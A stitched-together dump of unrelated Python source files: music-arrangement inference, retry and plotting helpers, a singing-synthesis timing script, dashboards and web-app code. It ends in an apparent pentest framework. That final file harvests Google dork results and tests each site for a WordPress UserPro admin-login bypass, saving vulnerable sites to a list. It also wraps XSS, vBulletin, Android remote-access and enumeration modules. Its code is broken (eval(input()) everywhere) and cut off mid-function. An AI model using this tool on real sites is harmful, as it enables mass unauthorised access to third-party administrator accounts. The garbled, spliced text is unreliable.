import logging
from pathlib import Path
import muspy
import numpy as np
import tqdm
from arranger.utils import (
load_config,
reconstruct_tracks,
save_sample_flat,
setup_loggers,
)
# Load configuration
CONFIG = load_config()
def parse_arguments():
"""Parse command-line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--input",
type=Path,
required=True,
help="input filename or directory",
)
parser.add_argument(
"-o", "--output_dir", type=Path, required=True, help="output directory"
)
parser.add_argument(
"-m",
"--model_filename",
type=Path,
required=True,
help="model filename",
)
parser.add_argument(
"-d",
"--dataset",
required=True,
choices=("bach", "musicnet", "nes", "lmd"),
help="dataset key",
)
parser.add_argument(
"-a",
"--audio",
action="store_true",
help="whether to write audio",
)
parser.add_argument(
"-s",
"--suffix",
default="pred",
help="suffix to the output filename(s)",
)
parser.add_argument(
"-q", "--quiet", action="store_true", help="reduce output verbosity"
)
return parser.parse_args()
def predict(music, model_filename):
"""Predict on a music."""
# Collect notes, labels and note counts
notes = []
for track in music.tracks:
# Skip drum track or empty track
if track.is_drum or not track.notes:
continue
# Collect notes and labels
for note in track.notes:
notes.append((note.time, note.pitch, note.duration, note.velocity))
# Sort the notes
notes.sort()
# Convert lists to arrays for speed reason
notes = np.array(notes, int)
# Load the learnt most common label
most_common_label = np.loadtxt(model_filename)
# Predict the labels using the optimal zone boundaries and permutation
predictions = np.full(len(notes), most_common_label)
return notes, predictions
def process(filename, args):
"""Process a file."""
# Load the data
music = muspy.load(filename)
# Get note and predicted labels
notes, predictions = predict(music, args.model_filename)
# Shorthands
programs = CONFIG[args.dataset]["programs"]
colors = CONFIG["colors"]
# Reconstruct and save the music using the predicted labels
music_pred = music.deepcopy()
music_pred.tracks = reconstruct_tracks(notes, predictions, programs)
save_sample_flat(
music_pred, args.output_dir, f"{filename.stem}_{args.suffix}", colors
)
if args.audio:
muspy.write_audio(
args.output_dir / f"{filename.stem}_{args.suffix}.wav", music_pred
)
# Save the samples with drums
if CONFIG[args.dataset]["has_drums"]:
music_pred.tracks.append(music.tracks[-1]) # append drum track
save_sample_flat(
music_pred,
args.output_dir,
f"{filename.stem}_{args.suffix}_drums",
colors,
)
if args.audio:
muspy.write_audio(
args.output_dir / f"{filename.stem}_{args.suffix}_drums.wav",
music_pred,
)
return notes, predictions
def main():
"""Main function."""
# Parse command-line arguments
args = parse_arguments()
# Check output directory
if args.output_dir is not None and not args.output_dir.is_dir():
raise NotADirectoryError("`output_dir` must be an existing directory.")
# Set up loggers
setup_loggers(
filename=args.output_dir / Path(__file__).with_suffix(".log").name,
quiet=args.quiet,
)
# Log command-line arguments
logging.debug("Running with command-line arguments :")
for arg, value in vars(args).items():
logging.debug(f"- {arg} : {value}")
# Process the file
if args.input.is_file():
process(args.input, args)
return
# Collect filenames
logging.info("Collecting filenames...")
filenames = list(args.input.glob("*.json"))
assert filenames, "No input files found. Only JSON files are supported."
# Start inference
logging.info("Start testing...")
for filename in tqdm.tqdm(filenames, disable=args.quiet, ncols=80):
process(filename, args)
if __name__ == "__main__":
main()
| StarcoderdataPython |
1659108 | #!/usr/bin/env python
"""Reliable executor for intermittently failing functions"""
import functools
import time
def reliably_execute(
partial_function: functools.partial,
*,
retry: int=3,
wait: int=5,
):
"""Helper function to reliably execute the provided partial function"""
remaining_tries: int = retry + 1
while remaining_tries > 0:
remaining_tries -= 1
try:
return partial_function()
# We catch Exception here because we don't know what kind it could be
except Exception as exception:
if remaining_tries:
time.sleep(wait)
continue
raise RuntimeError(
f'Could not reliably execute "{partial_function}" because of "{exception}"',
)
| StarcoderdataPython |
1667305 | <filename>script/maeplot/utils.py<gh_stars>1-10
import os
import errno
import math
def msecToMin(msec):
return float(msec) / 60000.0
def usecToMin(usec):
return msecToMin(usec / 1000)
def coverageToPercent(cov):
return cov * 100
def sameFloat(a, b, eps):
return abs(a - b) <= eps;
def mkdirRec(directory):
try:
os.makedirs(directory)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(directory):
pass
def getImmediateSubdirectories(p_dir):
return [name for name in os.listdir(p_dir)
if os.path.isdir(os.path.join(p_dir, name))]
def getSubdirectoriesConcat(p_dir):
subDirs = getImmediateSubdirectories(p_dir)
for i in xrange(0, len(subDirs)):
subDirs[i] = os.path.join(p_dir, subDirs[i])
return subDirs
def printHelp():
print "Usage: python plot.py <data directory>"
def calcStandardDeviation(data, meanValue):
if len(data) == 0:
return 0.0
diffSum = 0.0
count = float(len(data))
for value in data:
diffVal = float(value - meanValue)
diffSum = diffSum + (diffVal * diffVal)
return math.sqrt(diffSum / count)
def calcMean(dataSum, dataCount):
result = 0.0
if dataCount > 0:
result = float(dataSum) / float(dataCount)
return result
| StarcoderdataPython |
1749934 | <reponame>variable/todobackend
from django.contrib import admin
from .models import TODOItem
class TODOItemAmin(admin.ModelAdmin):
list_display = ['uuid', 'session_id', 'description', 'priority', 'created_at', 'completed_at']
admin.site.register(TODOItem, TODOItemAmin)
| StarcoderdataPython |
69531 | <reponame>stakira/ENUNU
#!/usr/bin/env python3
# Copyright (c) 2022 oatsu
"""
timelagとdurationをまとめて実行する。
MDN系のdurationが確率分布を持って生成されるため、フルラベルにしづらい。
そのため、timelagとdurationをファイル出力せずにtimingまで一気にやる。
"""
import hydra
import joblib
import numpy as np
import torch
from hydra.utils import to_absolute_path
from nnmnkwii.io import hts
from nnsvs.gen import postprocess_duration, predict_duration, predict_timelag
from nnsvs.logger import getLogger
from omegaconf import DictConfig, OmegaConf
from enulib.common import set_checkpoint, set_normalization_stat
logger = None
def _score2timelag(config: DictConfig, labels):
"""
全体の処理を実行する。
"""
# -----------------------------------------------------
# ここから nnsvs.bin.synthesis.my_app() の内容 --------
# -----------------------------------------------------
# loggerの設定
global logger # pylint: disable=global-statement
logger = getLogger(config.verbose)
logger.info(OmegaConf.to_yaml(config))
typ = 'timelag'
# CUDAが使えるかどうか
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# maybe_set_checkpoints_(config) のかわり
set_checkpoint(config, typ)
# maybe_set_normalization_stats_(config) のかわり
set_normalization_stat(config, typ)
# 各種設定を読み込む
model_config = OmegaConf.load(to_absolute_path(config[typ].model_yaml))
model = hydra.utils.instantiate(model_config.netG).to(device)
checkpoint = torch.load(config[typ].checkpoint,
map_location=lambda storage,
loc: storage)
model.load_state_dict(checkpoint['state_dict'])
in_scaler = joblib.load(config[typ].in_scaler_path)
out_scaler = joblib.load(config[typ].out_scaler_path)
model.eval()
# -----------------------------------------------------
# ここまで nnsvs.bin.synthesis.my_app() の内容 --------
# -----------------------------------------------------
# -----------------------------------------------------
# ここから nnsvs.bin.synthesis.synthesis() の内容 -----
# -----------------------------------------------------
# full_score_lab を読み取る。
# labels = hts.load(score_path).round_()
# hedファイルを読み取る。
question_path = to_absolute_path(config.question_path)
# hts2wav.pyだとこう↓-----------------
# これだと各モデルに別個のhedを適用できる。
# if config[typ].question_path is None:
# config[typ].question_path = config.question_path
# --------------------------------------
# hedファイルを辞書として読み取る。
binary_dict, continuous_dict = \
hts.load_question_set(question_path, append_hat_for_LL=False)
# pitch indices in the input features
# pitch_idx = len(binary_dict) + 1
pitch_indices = np.arange(len(binary_dict), len(binary_dict)+3)
# f0の設定を読み取る。
log_f0_conditioning = config.log_f0_conditioning
# timelagモデルを適用
# Time-lag
lag = predict_timelag(
device,
labels,
model,
model_config,
in_scaler,
out_scaler,
binary_dict,
continuous_dict,
pitch_indices,
log_f0_conditioning,
config.timelag.allowed_range,
config.timelag.allowed_range_rest
)
# -----------------------------------------------------
# ここまで nnsvs.bin.synthesis.synthesis() の内容 -----
# -----------------------------------------------------
# フルラベルとして出力する
# save_timelag_label_file(lag, score_path, timelag_path)
return lag
def _score2duration(config: DictConfig, labels):
"""
full_score と timelag ラベルから durationラベルを生成する。
"""
# -----------------------------------------------------
# ここから nnsvs.bin.synthesis.my_app() の内容 --------
# -----------------------------------------------------
# loggerの設定
global logger # pylint: disable=global-statement
logger = getLogger(config.verbose)
logger.info(OmegaConf.to_yaml(config))
typ = 'duration'
# CUDAが使えるかどうか
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# maybe_set_checkpoints_(config) のかわり
set_checkpoint(config, typ)
# maybe_set_normalization_stats_(config) のかわり
set_normalization_stat(config, typ)
# 各種設定を読み込む
model_config = OmegaConf.load(to_absolute_path(config[typ].model_yaml))
model = hydra.utils.instantiate(model_config.netG).to(device)
checkpoint = torch.load(config[typ].checkpoint,
map_location=lambda storage,
loc: storage)
model.load_state_dict(checkpoint['state_dict'])
in_scaler = joblib.load(config[typ].in_scaler_path)
out_scaler = joblib.load(config[typ].out_scaler_path)
model.eval()
# -----------------------------------------------------
# ここまで nnsvs.bin.synthesis.my_app() の内容 --------
# -----------------------------------------------------
# -----------------------------------------------------
# ここから nnsvs.bin.synthesis.synthesis() の内容 -----
# -----------------------------------------------------
# full_score_lab を読み取る。
# labels = hts.load(score_path).round_()
# いまのduraitonモデルだと使わない
# timelag = hts.load(timelag_path).round_()
# hedファイルを読み取る。
question_path = to_absolute_path(config.question_path)
# hts2wav.pyだとこう↓-----------------
# これだと各モデルに別個のhedを適用できる。
# if config[typ].question_path is None:
# config[typ].question_path = config.question_path
# --------------------------------------
# hedファイルを辞書として読み取る。
binary_dict, continuous_dict = \
hts.load_question_set(question_path, append_hat_for_LL=False)
# pitch indices in the input features
# pitch_idx = len(binary_dict) + 1
pitch_indices = np.arange(len(binary_dict), len(binary_dict)+3)
# f0の設定を読み取る。
log_f0_conditioning = config.log_f0_conditioning
# durationモデルを適用
duration = predict_duration(
device,
labels,
model,
model_config,
in_scaler,
out_scaler,
binary_dict,
continuous_dict,
pitch_indices,
log_f0_conditioning,
force_clip_input_features=False
)
# durationのタプルまたはndarrayを返す
return duration
def score2timing(config: DictConfig, path_score, path_timing):
"""
full_score から full_timing ラベルを生成する。
"""
# full_score を読む
score = hts.load(path_score).round_()
# timelag
timelag = _score2timelag(config, score)
# duration
duration = _score2duration(config, score)
# timing
timing = postprocess_duration(score, duration, timelag)
# timingファイルを出力する
with open(path_timing, 'w', encoding='utf-8') as f:
f.write(str(timing))
| StarcoderdataPython |
114266 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def LF_flux(FL, FR, lmax, lmin, UR, UL, dt, dx):
ctilde = dx / dt
return 0.5 * (FL + FR) - 0.5 * ctilde * (UR - UL)
| StarcoderdataPython |
44445 |
from thaniya_server_sudo import SudoScriptRunner
from thaniya_server.usermgr import BackupUserManager
from thaniya_server.sysusers import SystemAccountManager
class IUploadSlotContext:
@property
def backupUserManager(self) -> BackupUserManager:
raise NotImplementedError()
#
@property
def sudoScriptRunner(self) -> SudoScriptRunner:
raise NotImplementedError()
#
@property
def systemAccountManager(self) -> SystemAccountManager:
raise NotImplementedError()
#
#
| StarcoderdataPython |
3255827 | <reponame>kurli/chromium-crosswalk
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'includes': [
'../native_client/build/untrusted.gypi',
'nacl/nacl_defines.gypi',
],
'target_defaults': {
'variables': {
'nacl_target': 0,
},
'target_conditions': [
# This part is shared between the targets defined below. Only files and
# settings relevant for building the Win64 target should be added here.
['nacl_target==1', {
'include_dirs': [
'<(INTERMEDIATE_DIR)',
],
'defines': [
'<@(nacl_defines)',
],
'sources': [
# .cc, .h, and .mm files under nacl that are used on all
# platforms, including both 32-bit and 64-bit Windows.
# Test files are also not included.
'nacl/loader/nacl_ipc_adapter.cc',
'nacl/loader/nacl_ipc_adapter.h',
'nacl/loader/nacl_main.cc',
'nacl/loader/nacl_main_platform_delegate.h',
'nacl/loader/nacl_main_platform_delegate_linux.cc',
'nacl/loader/nacl_main_platform_delegate_mac.mm',
'nacl/loader/nacl_main_platform_delegate_win.cc',
'nacl/loader/nacl_listener.cc',
'nacl/loader/nacl_listener.h',
'nacl/loader/nacl_validation_db.h',
'nacl/loader/nacl_validation_query.cc',
'nacl/loader/nacl_validation_query.h',
],
# TODO(gregoryd): consider switching NaCl to use Chrome OS defines
'conditions': [
['OS=="win"', {
'defines': [
'__STDC_LIMIT_MACROS=1',
],
'include_dirs': [
'<(DEPTH)/third_party/wtl/include',
],
},],
['OS=="linux"', {
'defines': [
'__STDC_LIMIT_MACROS=1',
],
'sources': [
'../components/nacl/common/nacl_paths.cc',
'../components/nacl/common/nacl_paths.h',
'../components/nacl/zygote/nacl_fork_delegate_linux.cc',
'../components/nacl/zygote/nacl_fork_delegate_linux.h',
],
},],
],
}],
],
},
'conditions': [
['disable_nacl!=1', {
'targets': [
{
'target_name': 'nacl',
'type': 'static_library',
'variables': {
'nacl_target': 1,
},
'dependencies': [
'../base/base.gyp:base',
'../ipc/ipc.gyp:ipc',
'../ppapi/native_client/src/trusted/plugin/plugin.gyp:ppGoogleNaClPluginChrome',
'../ppapi/ppapi_internal.gyp:ppapi_shared',
'../ppapi/ppapi_internal.gyp:ppapi_ipc',
'../native_client/src/trusted/service_runtime/service_runtime.gyp:sel_main_chrome',
],
'conditions': [
['disable_nacl_untrusted==0', {
'dependencies': [
'../ppapi/native_client/native_client.gyp:nacl_irt',
'../ppapi/native_client/src/untrusted/pnacl_irt_shim/pnacl_irt_shim.gyp:pnacl_irt_shim',
'../ppapi/native_client/src/untrusted/pnacl_support_extension/pnacl_support_extension.gyp:pnacl_support_extension',
],
}],
],
'direct_dependent_settings': {
'defines': [
'<@(nacl_defines)',
],
},
},
],
'conditions': [
['OS=="win" and target_arch=="ia32"', {
'targets': [
{
'target_name': 'nacl_win64',
'type': 'static_library',
'variables': {
'nacl_target': 1,
},
'dependencies': [
'../native_client/src/trusted/service_runtime/service_runtime.gyp:sel_main_chrome64',
'../ppapi/ppapi_internal.gyp:ppapi_shared_win64',
'../ppapi/ppapi_internal.gyp:ppapi_ipc_win64',
'../components/nacl_common.gyp:nacl_common_win64',
],
'export_dependent_settings': [
'../ppapi/ppapi_internal.gyp:ppapi_ipc_win64',
],
'sources': [
'../components/nacl/broker/nacl_broker_listener.cc',
'../components/nacl/broker/nacl_broker_listener.h',
'../components/nacl/common/nacl_debug_exception_handler_win.cc',
],
'include_dirs': [
'..',
],
'defines': [
'<@(nacl_win64_defines)',
'COMPILE_CONTENT_STATICALLY',
],
'configurations': {
'Common_Base': {
'msvs_target_platform': 'x64',
},
},
'direct_dependent_settings': {
'defines': [
'<@(nacl_defines)',
],
},
},
],
}],
],
}, { # else (disable_nacl==1)
'targets': [
{
'target_name': 'nacl',
'type': 'none',
'sources': [],
},
],
'conditions': [
['OS=="win"', {
'targets': [
{
'target_name': 'nacl_win64',
'type': 'none',
'sources': [],
},
],
}],
],
}],
],
}
| StarcoderdataPython |
3386823 | """
Helper functions for missing functionality in cupy.
"""
try:
import cupy as xp
from cupyx.scipy.special import erf, gammaln
CUPY_LOADED = True
except ImportError:
import numpy as xp
from scipy.special import erf, gammaln
CUPY_LOADED = False
def betaln(alpha, beta):
r"""
Logarithm of the Beta function
.. math::
\ln B(\alpha, \beta) = \frac{\ln\gamma(\alpha)\ln\gamma(\beta)}{\ln\gamma(\alpha + \beta)}
Parameters
----------
alpha: float
The Beta alpha parameter (:math:`\alpha`)
beta: float
The Beta beta parameter (:math:`\beta`)
Returns
-------
ln_beta: float, array-like
The ln Beta function
"""
ln_beta = gammaln(alpha) + gammaln(beta) - gammaln(alpha + beta)
return ln_beta
def to_numpy(array):
"""Cast any array to numpy"""
if not CUPY_LOADED:
return array
else:
return xp.asnumpy(array)
def trapz(y, x=None, dx=1.0, axis=-1):
"""
Lifted from `numpy <https://github.com/numpy/numpy/blob/v1.15.1/numpy/lib/function_base.py#L3804-L3891>`_.
Integrate along the given axis using the composite trapezoidal rule.
Integrate `y` (`x`) along given axis.
Parameters
==========
y : array_like
Input array to integrate.
x : array_like, optional
The sample points corresponding to the `y` values. If `x` is None,
the sample points are assumed to be evenly spaced `dx` apart. The
default is None.
dx : scalar, optional
The spacing between sample points when `x` is None. The default is 1.
axis : int, optional
The axis along which to integrate.
Returns
=======
trapz : float
Definite integral as approximated by trapezoidal rule.
References
==========
.. [1] Wikipedia page: http://en.wikipedia.org/wiki/Trapezoidal_rule
Examples
========
>>> trapz([1,2,3])
4.0
>>> trapz([1,2,3], x=[4,6,8])
8.0
>>> trapz([1,2,3], dx=2)
8.0
>>> a = xp.arange(6).reshape(2, 3)
>>> a
array([[0, 1, 2],
[3, 4, 5]])
>>> trapz(a, axis=0)
array([ 1.5, 2.5, 3.5])
>>> trapz(a, axis=1)
array([ 2., 8.])
"""
y = xp.asanyarray(y)
if x is None:
d = dx
else:
x = xp.asanyarray(x)
if x.ndim == 1:
d = xp.diff(x)
# reshape to correct shape
shape = [1] * y.ndim
shape[axis] = d.shape[0]
d = d.reshape(shape)
else:
d = xp.diff(x, axis=axis)
nd = y.ndim
slice1 = [slice(None)] * nd
slice2 = [slice(None)] * nd
slice1[axis] = slice(1, None)
slice2[axis] = slice(None, -1)
product = d * (y[tuple(slice1)] + y[tuple(slice2)]) / 2.0
try:
ret = product.sum(axis)
except ValueError:
ret = xp.add.reduce(product, axis)
return ret
| StarcoderdataPython |
189024 | """Controller holding and managing HUE resources of type `scene`."""
from typing import Optional, Type, Union
from ..models.feature import DimmingFeaturePut, RecallAction, RecallFeature
from ..models.resource import ResourceTypes
from ..models.room import Room
from ..models.scene import Scene, ScenePut
from ..models.zone import Zone
from .base import BaseResourcesController
class ScenesController(BaseResourcesController[Type[Scene]]):
"""Controller holding and managing HUE resources of type `scene`."""
item_type = ResourceTypes.SCENE
item_cls = Scene
allow_parser_error = True
async def recall(
self,
id: str,
dynamic: bool = False,
duration: Optional[int] = None,
brightness: Optional[float] = None,
) -> None:
"""Turn on / recall scene."""
action = RecallAction.DYNAMIC_PALETTE if dynamic else RecallAction.ACTIVE
update_obj = ScenePut(recall=RecallFeature(action=action, duration=duration))
if brightness is not None:
update_obj.recall.dimming = DimmingFeaturePut(brightness=brightness)
await self.update(id, update_obj)
def get_group(self, id: str) -> Union[Room, Zone]:
"""Get group attached to given scene id."""
scene = self[id]
return next((x for x in self._bridge.groups if x.id == scene.group.rid))
| StarcoderdataPython |
3306735 | import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.express as px
import pandas as pd
import requests
import json
from app import app
base_url = 'https://api.pro.coinbase.com/products/{}/candles?granularity=86400'
def getBTCData(currency):
sym = 'BTC' + '-' + currency
url = base_url.format(sym)
response = requests.get(url)
if response.status_code == 200:
data = pd.DataFrame(json.loads(response.text),
columns=['Time', 'Low', 'High', 'Open', 'Close', 'Volume'])
data['Date'] = pd.to_datetime(data['Time'], unit='s')
return data
else:
return None
layout = html.Div([
dcc.Link('Home', href='/home'),
html.H1('BTC-Fiat Price Charts'),
dcc.Dropdown(
id='fiat-dropdown-1',
options=[
{'label': i, 'value': i} for i in [
'USD', 'EUR', 'JPY', 'GBP', 'CHF'
]
]
),
html.Div(id='btc-fiat-chart'),
dcc.Link('View ETH Pricing', href='/eth')
])
@app.callback(
Output('btc-fiat-chart', 'children'),
Input('fiat-dropdown-1', 'value'))
def display_value(value):
if value is None:
return html.Div()
data = getBTCData(value)
if data is None:
return html.H3("No data found for BTC/{}".format(value))
fig = px.line(data, x='Date', y='Close')
return dcc.Graph(id='btc-fiat-chart-obj',
figure=fig) | StarcoderdataPython |
1634231 | #!/usr/bin/env python
"""
inspiration.
* https://github.com/eightBEC/fastapi-ml-skeleton/tree/master/fastapi_skeleton
(APACHE 2.0)
* https://github.com/leosussan/fastapi-gino-arq-uvicorn
(PUBLIC DOMAIN)
"""
from fastapi import FastAPI
from fast_microservice.helpers import MiddlewareWrapper
from fast_microservice.routers import error, heartbeat, versions
from fast_microservice.settings.globals import (
API_PREFIX,
APP_NAME,
APP_VERSION,
DEBUG,
SENTRY_DSN,
SENTRY_ENABLED,
)
ROUTERS = (heartbeat.router, versions.router, error.router)
def get_app() -> FastAPI:
""" Fastapi App instance. """
fast_app = FastAPI(title=APP_NAME, version=APP_VERSION, debug=DEBUG)
for router in ROUTERS:
fast_app.include_router(router, prefix=API_PREFIX)
if SENTRY_ENABLED and SENTRY_DSN not in ("None", ""):
import sentry_sdk
from sentry_sdk.integrations.asgi import SentryAsgiMiddleware
sentry_sdk.init(dsn=str(SENTRY_DSN))
fast_app = MiddlewareWrapper(SentryAsgiMiddleware(fast_app))
return fast_app
app = get_app()
| StarcoderdataPython |
75198 | <reponame>GDGSNF/PXXTF<filename>core/postex.py
#!/usr/bin/python
import os, sys, subprocess, bs4,signal,requests
import core
from urllib.parse import quote
from socket import timeout
from urllib.request import urlopen
from urllib.request import Request
import readline, rlcompleter
from sys import argv
from subprocess import *
from core import help
R = '\033[31m' # Red
N = '\033[1;37m' # White
G = '\033[32m' # Green
O = '\033[0;33m' # Orange
B = '\033[1;34m' #Blue
E = '\033[0m' # End
def clean():
os.system("clear")
def wordpress_scan():
while True:
sec = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/wordpress_user_scanners"+N+"): "))
if sec == 'show options':
help.option()
wordpress_scan()
elif sec =='back':
core.menu.post()
elif sec =='set target':
wop = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/wordpress_user_scanners "+G+"(target)"+N+"): "))
enum = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/wordpress_user_scanners "+G+"(user)"+N+"): "))
uiop = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/wordpress_user_scanners"+N+"): "))
if uiop == "run":
print((""+B+"[*]"+N+" Starting attacks..."))
os.system("cd modules;cd wscan;python wpscanner.py -s %s -n %s" % (wop,enum))
print((""+B+"[*]"+N+" Job finished!"))
print()
wordpress_scan()
else:
wordpress_scan()
elif sec == 'clear':
clean()
wordpress_scan()
elif sec =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", sec))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
wordpress_scan()
pass
def dirse():
while True:
dir = eval(input("Pentest>> ("+B+"modules/post)("+R+"post/dir_search"+N+"): "))
if dir == 'show options':
help.option()
dirse()
elif dir =='back':
core.menu.post()
elif dir == 'set target':
ym = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/dir_search "+G+"(set target)"+N+"): "))
print(("target => "+R+"",ym))
puki = eval(input("Pentest>> ("+B+"modules/post)("+R+"post/dir_search "+G+"(set extensions)"+N+"): "))
dih = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/dir_search"+N+"): "))
if dih == "run":
os.system("python mpdules/dirsearch/dirsearch.py -u %s -e %s" % (ym,puki))
print((""+B+"[*]"+N+" Job finished!"))
print()
dirse()
else:
dirse()
elif dir =='clear':
clean()
dirse()
elif dir =='exit':
print()
print((""+G+"Thanks for using PXXTF"))
print()
exit()
else:
print(("Wrong Command => ", dir))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
dirse()
pass
def xss():
while True:
cs = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/cms_war "+N+"): "))
if cs == 'show options':
help.option()
xss()
elif cs == 'set target':
tops = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/cms_war "+G+"(set target)"+N+"): "))
print(("target =>"+R+"" ,tops))
gay = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/cms_war"+N+"): "))
if gay == "run":
print((""+B+"[*]"+N+" Starting attacks Scanning..."))
os.system("cd modules;cd xsspy;python XssPy.py -u %s -v" % (tops))
print((""+B+"[*]"+N+" Job finished!"))
print()
xss()
else:
xss()
elif cs =='back':
core.menu.post()
elif cs =='clear':
clean()
xss()
elif cs =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", cs))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
xss()
pass
def wordpress():
while True:
wor = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/usr_pro_wordpress_auto_find"+N+"): "))
if wor == 'show options':
print("Name Description")
print("===== =============")
print("set target start target")
print("back back to menu")
wordpress()
elif wor == 'back':
core.menu.post()
elif wor == 'set target':
def tracker(keywords, start):
searchQuery = quote(keywords, safe='') # This line makes the script Support all encodings
try:
url = "https://www.google.com/search?gl=ir&num=100&start=" + str(
start) + "&pws=0&as_qdr=all&dcr=0&q=" + searchQuery
req = Request(url) # Sets the SERPs URL!!
except timeout:
print("Connection timed out!")
req.add_header('User-Agent',
'userpro1 aef by orm')
serpURL = urlopen(req).read() # Opens and Reads The Serp Page
soup = bs4.BeautifulSoup(serpURL, "html.parser") # Sets the Serp URL On Soup
allResults = [] # An Empty Array to Save the Results
i=0
for hit in soup.findAll('cite'): # a for-each loop, to check all <cite ....> Elements in Page
# if the domain was between <cite> and </cite>
allResults.append(
str("")+hit.text) # Results will add to allResults
i=i+1
if (len(allResults) == 0):
return(""+R+"[!] "+N+"No result found for this keyword => " + keywords)
else:
print((""+B+"[*]"+N+" Ok! Starting... \n"))
for element in allResults: # Prints all the results
if (element.startswith("http://")):
element = element[7:]
if (element.startswith("https://")):
element = element[8:]
if (element.startswith("www.")):
element = element[4:]
element=element[:element.find("/")]
element="http://"+element
print(("checking "+element+" :"))
if (checkwp(element)):
suc = str(checkVul(element))
if( suc=="True"):
try:
filee = open("priv8.txt", mode="a+")
filee.write(element+"\n")
filee.close()
except:
print((""+R+"error"+N+""))
print (suc)
else:
print((""+R+"False"+N+""))
else:
print((element + ""+R+" =>"+N+" " + str(checkwp(element))))
def checkwp(url):
url+="/wp-content/plugins/userpro/css/userpro.min.css"
try:
pURL = urlopen(url).read()
except:
return False
if (pURL.find(".userpro")>-1):
print((""+B+"[!] "+N+" Plugin is installed checking vulnerable...\n"))
return True
else:
return False
def checkVul(url):
url1=url + "/?up_auto_log=true"
try:
pURL = urlopen(url1).read()
if (pURL.find("admin-bar-css")>-1):
return True
elif (urlopen(url + "/wp-admin").read().find("admin-bar-css")>-1):
return True
else :return False
except:
return False
while(True):
x = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/usr_pro_wordpress_auto_find (set Dork)"+N+"): "))
print(("DORKS => "+R+"",x))
n= eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/usr_pro_wordpress_auto_find (start number)"+N+"): "))
print(("START NUMBER => "+R+"",n))
g= eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/usr_pro_wordpress_auto_find (set end_number)"+N+"): "))
print(("END NUMBER => "+R+"",g))
run = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/usr_pro_wordpress_auto_find"+N+"): "))
if run == "run":
print((""+B+"[*] "+N+"Starting attacks..."))
while(True):
tracker(x, n)
y=eval(input(""+B+"[*]"+N+" Next (y/n)?"))
if(y=="y"):
n+=g;
tracker(x, n)
else:
core.menu.scan()
y1=eval(input(""+B+"[*]"+N+" Anouther dork (y/n) ?"))
if (y1 == "y"):
continue
else:
core.menu.scan()
elif wor == 'clear':
clean()
wordpress()
elif wor =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", wor))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
wordpress()
pass
def android():
while True:
dd = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/android_remote_acces"+N+"): "))
if dd == 'show options':
help.option()
android()
elif dd =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif dd == "back":
core.menu.post()
elif dd == 'set target':
os.system("cd modules;cd android;python2 android.py")
android()
elif dd == 'clear':
clean()
android()
else:
print(("Wrong Command => ", dd))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
android()
def vb():
while True:
list = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/vbulletin"+N+"): "))
if list == 'show options':
help.option()
vb()
elif list =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif list == "back":
core.menu.post()
elif list == 'set target':
go = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/vbulletin (vbulletin$)"+N+"): "))
print(("target =>"+R+"",go))
se = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/vbulletin (vbulletin$)"+N+"): "))
if se == "run":
os.system('python modules/vbulletin/vb.py %s' % (go))
vb()
elif se =='back':
core.menu.post()
elif list == 'clear':
clean()
vb()
else:
print(("Wrong Command => ", list))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
vb()
def num():
while True:
list = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/enumeration"+N+"): "))
if list == 'show options':
help.option()
num()
elif list =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif list == "back":
core.menu.post()
elif list == 'set target':
go = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/enumeration "+G+"(set target IP/domain)"+N+"): "))
print()
print(' command Descriptions ')
print(' --------- ----------------')
print((" target =>"+R+"",go))
print(' --------------------------------------')
print(' run Start attack')
print(' back back ')
print()
se = eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/enumeration "+G+"(set target IP/domain)"+N+"): "))
if se == "run":
os.system('python modules/enum/http-enum.py -t %s' % (go))
num()
elif se =='back':
core.menu.post()
elif list == 'clear':
clean()
num()
else:
print(("Wrong Command => ", list))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
num()
def smb():
while True:
map =eval(input(""+N+"Pentest>> ("+B+"modules/post)("+R+"post/samba"+N+"): "))
if map == 'show options':
help.option()
smb()
elif map =='exit':
print()
